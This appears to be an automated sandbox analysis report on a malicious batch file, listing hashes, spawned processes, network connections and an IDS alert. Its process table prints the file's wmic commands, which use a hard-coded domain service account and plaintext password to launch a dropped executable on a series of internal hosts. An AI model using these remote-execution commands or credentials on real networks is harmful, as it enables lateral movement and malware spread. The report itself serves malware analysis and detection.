File name: | xav8.bat |
Full analysis: | https://app.any.run/tasks/30af000c-efa4-4875-92b1-41c3eb377f14 |
Verdict: | Malicious activity |
Analysis date: | September 18, 2019, 18:52:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | FF0CE8CBCD276AF352F3D0B4263D18AD |
SHA1: | 415D931B5F097E53CB1C7BF46BDFCE0C8F3A6A52 |
SHA256: | DDF4385480816035B8FB06964A36666B8DFAAC6A1584990B1AD9444D0A8E5AA8 |
SSDEEP: | 192:kYlifMZmXzEBu7Ylif264bISOJPaWo17pePfYdLdOn0gj1nNJW869GCFpjMi7E33:WP |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3028 | cmd /c ""C:\Users\admin\AppData\Local\Temp\xav8.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3864 | wmic /node:"10.158.10.243" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3976 | wmic /node:"10.158.10.244" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2184 | wmic /node:"10.158.10.245" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2592 | wmic /node:"10.158.10.246" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2936 | wmic /node:"10.158.10.247" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3052 | wmic /node:"10.158.10.248" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3180 | wmic /node:"10.158.10.249" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3328 | wmic /node:"10.158.10.251" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3572 | wmic /node:"10.158.10.255" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 10.158.10.244:137 | — | — | — | unknown |
— | — | 10.158.10.245:137 | — | — | — | unknown |
— | — | 10.158.10.243:137 | — | — | — | unknown |
— | — | 10.158.10.246:137 | — | — | — | unknown |
— | — | 10.158.10.249:137 | — | — | — | unknown |
— | — | 10.158.10.248:137 | — | — | — | unknown |
— | — | 10.158.10.247:137 | — | — | — | unknown |
— | — | 10.158.10.243:135 | — | — | — | unknown |
— | — | 10.158.11.11:137 | — | — | — | unknown |
— | — | 10.158.10.244:135 | — | — | — | unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection |